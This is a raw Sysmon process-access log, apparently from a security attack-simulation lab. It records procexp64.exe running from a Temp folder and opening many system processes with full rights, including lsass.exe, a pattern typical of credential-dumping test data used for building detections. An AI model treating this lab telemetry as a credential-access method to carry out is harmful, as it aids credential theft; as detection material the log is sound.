15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792899Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792898Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792897Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792896Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792895Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792894Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792893Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792892Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792891Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792890Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792889Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792888Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792887Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792886Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792885Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792884Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792883Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792882Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792881Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792880Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792879Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792878Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792877Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792876Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792875Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792874Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792873Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792872Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792871Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792870Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792869Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792868Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792867Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792866Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792865Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792864Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792863Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792862Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 